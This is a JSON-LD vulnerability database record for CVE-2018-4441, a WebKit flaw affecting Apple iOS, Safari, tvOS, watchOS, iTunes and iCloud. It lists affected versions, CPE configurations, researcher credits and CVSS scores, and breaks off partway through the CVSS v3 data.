Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201904-1323", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "tvos", "scope": "lt", "trust": 1.0, "vendor": "apple", "version": "12.1.1" }, { "model": "watchos", "scope": "lt", "trust": 1.0, "vendor": "apple", "version": "5.1.2" }, { "model": "icloud", "scope": "lt", "trust": 1.0, "vendor": "apple", "version": "7.9" }, { "model": "itunes", "scope": "lt", "trust": 1.0, "vendor": "apple", "version": "12.9.2" }, { "model": "iphone os", "scope": "lt", "trust": 1.0, "vendor": "apple", "version": "12.1.1" }, { "model": "safari", "scope": "lt", "trust": 1.0, "vendor": "apple", "version": "12.0.2" }, { "model": "icloud", "scope": "lt", "trust": 0.8, "vendor": "apple", "version": "for windows 7.9 (windows 7 or later )" }, { "model": "ios", "scope": "lt", "trust": 0.8, "vendor": "apple", "version": "12.1.1 (ipad air or later )" }, { "model": "ios", "scope": "lt", "trust": 0.8, "vendor": "apple", "version": "12.1.1 (iphone 5s or later )" }, { "model": "ios", "scope": "lt", "trust": 0.8, "vendor": "apple", "version": "12.1.1 (ipod touch first 6 generation )" }, { "model": "itunes", "scope": "lt", "trust": 0.8, "vendor": "apple", "version": "for windows 12.9.2 (windows 7 or later )" }, { "model": "safari", "scope": "lt", "trust": 0.8, "vendor": "apple", "version": "12.0.2 (macos high sierra 10.13.6)" }, { "model": "safari", "scope": "lt", "trust": 0.8, "vendor": "apple", "version": "12.0.2 (macos mojave 10.14.1)" }, { "model": "safari", "scope": "lt", "trust": 0.8, "vendor": "apple", "version": "12.0.2 (macos sierra 10.12.6)" }, { "model": "tvos", "scope": "lt", "trust": 0.8, "vendor": "apple", "version": "12.1.1 (apple tv 4k)" }, { "model": "tvos", "scope": "lt", "trust": 0.8, "vendor": "apple", "version": "12.1.1 (apple tv first 4 generation )" }, { "model": "watchos", "scope": "lt", "trust": 0.8, "vendor": "apple", "version": "5.1.2 (apple watch series 1 or later )" }, { "model": "open source project webkit", "scope": "eq", "trust": 0.3, "vendor": "webkit", "version": "0" }, { "model": "esignal", "scope": "eq", "trust": 0.3, "vendor": "esignal", "version": "6.0.2" }, { "model": "watchos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.1.1" }, { "model": "watchos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.3.2" }, { "model": "watchos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.3.1" }, { "model": "watchos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.1.3" }, { "model": "watchos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.1.1" }, { "model": "watchos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "2.2.2" }, { "model": "watchos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "2.2.1" }, { "model": "watchos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "2.0.1" }, { "model": "watchos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "1.0.1" }, { "model": "watchos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5" }, { "model": "watchos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.3" }, { "model": "watchos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2.3" }, { "model": "watchos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2.2" }, { "model": "watchos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2" }, { "model": "watchos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.1" }, { "model": "watchos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4" }, { "model": "watchos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.2.3" }, { "model": "watchos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.2.2" }, { "model": "watchos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.2.1" }, { "model": "watchos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.2" }, { "model": "watchos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.1" }, { "model": "watchos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.0" }, { "model": "watchos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3" }, { "model": "watchos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "2.2" }, { "model": "watchos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "2.1" }, { "model": "watchos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "2.0" }, { "model": "watchos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "1.0" }, { "model": "watchos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "0" }, { "model": "tvos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.4.1" }, { "model": "tvos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.2.6" }, { "model": "tvos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.2.5" }, { "model": "tvos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.1.1" }, { "model": "tvos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.0.1" }, { "model": "tvos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.2.2" }, { "model": "tvos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.2.1" }, { "model": "tvos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.1.1" }, { "model": "tvos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.2" }, { "model": "tvos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.1" }, { "model": "tvos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.0" }, { "model": "tvos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "12" }, { "model": "tvos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.4" }, { "model": "tvos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.2.1" }, { "model": "tvos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.2" }, { "model": "tvos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.1" }, { "model": "tvos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11" }, { "model": "tvos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.2.2" }, { "model": "tvos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.2.1" }, { "model": "tvos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.2" }, { "model": "tvos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.1" }, { "model": "tvos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10" }, { "model": "tvos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "0" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "12.7.5" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "12.7.4" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "12.7.3" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "12.6.2" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "12.5.5" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "12.5.1" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "12.4.2" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "12.3.2" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "12.3.1" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.2.1" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.1.5" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.1.4" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.1.3" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.1.2" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.1.1" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.0.5" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.0.4" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.0.2" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.6.3" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.6.1" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.5.1" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.1.2" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.2.1" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.0.2" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.0.1" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.0" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.3.2" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.3.1" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.3" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.0.2" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.0.5" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.0.4" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.0.3" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.0.1" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.0" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5.0" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.8" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.7.1" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.7" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.2" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.1.1" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.1" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.0.3" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.2" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.1" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.0.2.20" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.0" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.4" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "12.8" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "12.7.2" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "12.7" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "12.6" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "12.5.4" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "12.5.2" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "12.4" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "12.3" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "12.2" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "12.0.1" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.2" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.1" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.0.3" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.0.1" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.0.0.163" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.0" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.7" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.6.1.7" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.6" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.5.3" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.5.2" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.5.1.42" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.5" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.4.1.10" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.4.1" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.4.0.80" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.4" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.3.1" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.3" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.2.2.12" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.2.2" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.2" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.1.1.4" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.1.1" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.1" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.0.1" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10" }, { "model": "ipod touch", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "0" }, { "model": "iphone", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "0" }, { "model": "ipad air", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "0" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "50" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "40" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "30" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "12.0.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.4.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.2.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.0.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.3.4" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.3.3" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.3.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.3.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.2.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.0.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.0.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.4.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.0.6" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.0.5" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.0.3" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.0.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.0.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.3.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.1.6" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.1.4" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.1.3" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.0.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.0.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.2.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.2.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.3.5" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.3" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.4" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.3" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.1.3" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.1.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.1.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.1.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.1.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.0.4" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.0.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.0.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5.1.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5.0.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.3.5" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.3.4" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.3.3" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.3.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.3.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.3" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2.9" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2.8" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2.7" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2.6" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2.5" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2.10" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.0" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "2.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "2.0" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "12.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "12" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.4" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.3.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.3" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.2.6" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.2.5" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.2.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.2.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.3.3" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.3.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.3.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.3" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "0" }, { "model": "icloud", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.1.1" }, { "model": "icloud", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.6" }, { "model": "icloud", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.5" }, { "model": "icloud", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.4" }, { "model": "icloud", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.3" }, { "model": "icloud", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.2" }, { "model": "icloud", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.0" }, { "model": "icloud", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.2.2" }, { "model": "icloud", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.2.1" }, { "model": "icloud", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.2" }, { "model": "icloud", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.1" }, { "model": "icloud", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.0.1" }, { "model": "icloud", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.0" }, { "model": "watchos", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "5.1.2" }, { "model": "tvos", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "12.1.1" }, { "model": "itunes", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "12.9.2" }, { "model": "ios", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "12.1.1" }, { "model": "icloud", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "7.9" } ], "sources": [ { "db": "BID", "id": "106340" }, { "db": "JVNDB", "id": "JVNDB-2018-014901" }, { "db": "NVD", "id": "CVE-2018-4441" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:apple:icloud", "vulnerable": true }, { "cpe22Uri": "cpe:/o:apple:iphone_os", "vulnerable": true }, { "cpe22Uri": "cpe:/a:apple:itunes", "vulnerable": true }, { "cpe22Uri": "cpe:/a:apple:safari", "vulnerable": true }, { "cpe22Uri": "cpe:/o:apple:apple_tv", "vulnerable": true }, { "cpe22Uri": "cpe:/o:apple:watchos", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-014901" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "lokihardt of Google Project Zero,Specter", "sources": [ { "db": "CNNVD", "id": "CNNVD-201812-215" } ], "trust": 0.6 }, "cve": "CVE-2018-4441", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CVE-2018-4441", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.9, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "VHN-134472", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.8, "id": "CVE-2018-4441", 